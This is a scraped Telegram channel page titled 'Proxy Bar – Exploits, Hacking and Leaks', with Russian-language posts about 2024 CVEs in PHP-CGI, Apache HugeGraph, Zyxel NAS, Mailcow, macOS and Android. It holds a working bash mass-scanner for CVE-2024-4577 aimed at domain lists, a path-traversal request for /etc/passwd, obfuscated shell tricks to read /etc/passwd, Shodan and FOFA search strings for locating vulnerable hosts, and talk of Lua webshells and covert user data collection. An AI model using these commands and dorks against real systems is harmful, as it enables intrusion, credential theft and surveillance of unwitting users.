Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
77 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
CVE-2024-27822 macOS PackageKit
*
LPE
*
Для версий:
macOS 14.5 Beta 1 (23F5049f) and older
macOS 13.6.6 (22G630) and older
macOS 12.7.4 (21H1123) and older
Any version of macOS 11 or older
*
writeUp
*
exploit

#macos #lpe
👍4😱1
CVE-2024-27348 RCE в Apache HugeGraph Server
*
Usage:
python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute"

*
POC exploit

#apache #rce
🔥10
Proxy Bar pinned a photo
CVE-2024-4577 Argument Injection in PHP-CGI
*
При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда PHP-CGI работает на платформе Windows и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации.
*
fofa link (610,604 хостов)

#php #xamp
👍14
CVE-2024-4577 Argument Injection in PHP-CGI
ДОПОЛНЕНИЕ к предыдущему посту
BASH:
#!/bin/bash

# Function to check vulnerability for a domain
check_vulnerability() {
local domain=$1
local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
-H "User-Agent: curl/8.3.0" \
-H "Accept: */*" \
-H "Content-Length: 23" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: keep-alive" \
--data "<?php phpinfo(); ?>" \
--max-time 10)

if [[ $response == *"PHP Version"* ]]; then
echo "$domain: Vulnerable"
fi
}

# Main function to iterate over domains
main() {
local file=$1
while IFS= read -r domain || [ -n "$domain" ]; do
check_vulnerability "$domain"
done < "$file"
}

# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <domain_list_file>"
exit 1
fi

# Call the main function with the domain list file
main "$1"


*
Сохраняйте скрипт и по списку доменов:
./CVE-2024-4577_noscript.sh /path/to/domains-list

#php #xamp
🔥12
This media is not supported in your browser
VIEW IN TELEGRAM
DDOS для самых маленьких

#pic
🔥62👍14😱2
😱8
CVE-2024-30078.poc
2.9 KB
🔥22👍7😱2
How To Harden Active Directory To Prevent Cyber Attacks
Вебинар
PDF
Не поленитесь открыть PDF, можно даже не читать, картинки ТОП.

#ad #sec
👍14🔥7
BYPASS

cat ${HOME:0:1}etc${HOME:0:1}passwd

`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`

cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

cat `xxd -r -ps <(echo 2f6574632f706173737764)`
🔥30😱14👍8
Вчера на ночь глядя стукнула мысль, как бы реализовать редирект юзера в зависимости от правильно\неправильно был дан ответ на http basic authentication (который на nginx).
Ну то есть если логин\пароль верный - отправило на правильный сайт.
логин\пароль не верный - юзер ушел на страницу сбора данных (разрешение экрана, вебка и тд). ну или просто в лог писать.
Добрый гугл сказать соединить nginx + LUA.
После слова Lua я про первую мысль как то подзабыл.
Варианта три:
1 - собрать руками джинс + луа
2 - докер
3 - OpenResty
Сам по себе Lua открывает тонну возможностей для хороших и не очень😝 целей.
Как минимум можно получать webshell просто описав vhost (самый обычный nginx + пара строк на Lua) ну или получать полноценный lua cli
Оказвается нормальные пацаны уже сделали, гит ломится от решений.
Почитайте короткую статейку )
Backdooring OpenResty Servers

#ЯбудуЗватьТебяЛУ #nginx
🔥14👍3
CVE-2024-34470 HSC MailInspector
*
POC:
GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd

FOFA:
noscript=="..:: HSC MailInspector ::.."
👍19
CVE-2024-28397 js2py
sandbox escape, bypass pyimport restriction
*
POC + fix

#python #js #poc
🔥7😱2
Не ну, why not ?)
я так понимаю docker RCE
CVSS Score: 146 %
👍29🔥8😱7
Gimmick
*
Section-based payload obfuscation technique for x64
*
download
👍7🔥4
CVE 2024 0044
*
Дырка в Android 12 и 13. Уязвимость позволяет злоумышленнику выполнить атаку «запуск от имени любого приложения», что приводит к локальное повышение привилегий без вмешательства пользователя
*
exploit

#android
😱18🔥6👍5
CVE-2024-29973 Unauth inject Zyxel NAS
*
SHODAN: http.noscript:"Zyxel NAS326"
FOFA: app="NAS542" || app="ZYXEL-NAS326"
*
exploit

#nas #zyxel
🔥28👍1😱1
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-4577 PHP CGI Remote Code Execution
*
writeUP

для версий:
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
*
POC

#php #rce
🔥18👍2
CVE-2024-30270
*
Дырка в почтовом сервере с открытым исходным кодом Mailcow.
CVSS: 6,7

Связана с обходом пути, затрагивая функцию rspamd_maps(), которая может привести к выполнению произвольных команд на сервере, позволяя злоумышленнику перезаписать любой файл.
*
exploit

#mail
👍18🔥6😱3